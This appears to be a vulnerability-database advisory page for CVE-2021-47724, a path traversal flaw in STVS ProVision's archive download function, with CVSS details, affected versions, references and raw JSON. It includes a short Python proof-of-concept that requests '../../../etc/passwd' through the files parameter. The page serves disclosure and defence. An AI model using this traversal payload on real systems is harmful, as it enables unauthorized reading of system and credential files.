Security Vulnerability Report
中文
CVE-2021-47724 CVSS 6.5 MEDIUM

CVE-2021-47724

Published: 2025-12-09 21:15:51
Last Modified: 2026-02-13 17:35:34

Description

STVS ProVision 5.9.10 contains a path traversal vulnerability that allows authenticated attackers to access arbitrary files by manipulating the files parameter in the archive download functionality. Attackers can send GET requests to /archive/download with directory traversal sequences to read sensitive system files like /etc/passwd.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:stvs:provision:5.5:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:stvs:provision:5.6:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:stvs:provision:5.7:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:stvs:provision:5.8.6:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:stvs:provision:5.9.0:*:*:*:*:*:*:* - VULNERABLE
STVS ProVision 5.9.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests url = 'http://target.com/arch/archive/download' params = {'files': '../../../etc/passwd'} response = requests.get(url, params=params, auth=('user', 'pass')) print(response.text)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47724", "sourceIdentifier": "[email protected]", "published": "2025-12-09T21:15:50.927", "lastModified": "2026-02-13T17:35:33.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "STVS ProVision 5.9.10 contains a path traversal vulnerability that allows authenticated attackers to access arbitrary files by manipulating the files parameter in the archive download functionality. Attackers can send GET requests to /archive/download with directory traversal sequences to read sensitive system files like /etc/passwd."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.5:*:*:*:*:*:*:*", "matchCriteriaId": "5C0F2D09-CDB3-4DAA-8C6A-1CFF4B5D2AF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.6:*:*:*:*:*:*:*", "matchCriteriaId": "C75EA53C-2681-479C-B911-7CE5AEE00E69"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.7:*:*:*:*:*:*:*", "matchCriteriaId": "A5EDCA0E-E4BF-4D4A-92D7-7433CC23A9EC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.8.6:*:*:*:*:*:*:*", "matchCriteriaId": "21131E39-42C6-43BC-8C53-7D4036D3B3AE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "807E2E4F-85FB-46AD-8ABF-12ECBF30047C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.9.1:*:*:*:*:*:*:*", "matchCriteriaId": "5AC87B35-CCF1-43B8-9DB4-8C7D2BEF51FA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.9.7:*:*:*:*:*:*:*", "matchCriteriaId": "83FEE9FC-3E43-47F1-BA35-2BB7C7DAA443"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.9.9:*:*:*:*:*:*:*", "matchCriteriaId": "D8BE45C5-7BD9-4853-99C9-D8969EB8FC94"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.9.10:*:*:*:*:*:*:*", "matchCriteriaId": "495B9F3E-DD0F-4010-AE20-1A763AF04D7C"}]}]}], "references": [{"url": "http://www.stvs.ch", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.exploit-db.com/exploits/49481", "source": "[email protected]", "tags": ["Exploit", "Technical Description"]}, {"url": "https://www.vulncheck.com/advisories/stvs-provision-authenticated-file-disclosure-via-archiverb", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5623.php", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}